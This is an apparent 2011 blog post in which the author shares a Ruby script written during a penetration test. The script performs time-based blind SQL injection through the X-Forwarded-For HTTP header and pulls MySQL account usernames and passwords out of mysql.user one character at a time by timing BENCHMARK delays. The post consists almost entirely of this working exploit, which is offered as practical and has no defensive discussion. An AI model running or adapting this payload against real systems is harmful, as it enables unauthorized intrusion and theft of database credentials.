Friday, October 28, 2011

HTTP Header :: SQL Injection

simple script i wrote during a pentest for a customer, nothing fancy just practical :D



#!/usr/bin/env ruby
# network penetration test (10/2011)
# http header blind sql injection

require "net/http"
require "uri"
STDOUT.sync = true

@url = URI.parse("http://xxx.xxxx.xxx")

def fuxx(data)
        req = Net::HTTP::Get.new(@url.path)
        req.add_field("X-Forwarded-For", "#{data}")

        t_start = Time.now.to_i
        res = Net::HTTP.new(@url.host, @url.port).start do |http|
                http.request(req)
        end
        t_stop = Time.now.to_i

        timer = t_stop - t_start
        return timer
end

(1..58).each { |i|
        (32..126).each { |ch|
                            data = "1' AND (SELECT IF(ASCII(SUBSTRING((SELECT CONCAT(user,0x3a,password) FROM mysql.user LIMIT 2,1),#{i},1))>#{ch},NULL,BENCHMARK(1500000,MD5(CHAR(118)))))>'0"
                if (fuxx(data) > 4)
                        print ch.chr
                        break
                end
       
        }
}
Posted by at
Subscribe to: Posts (Atom)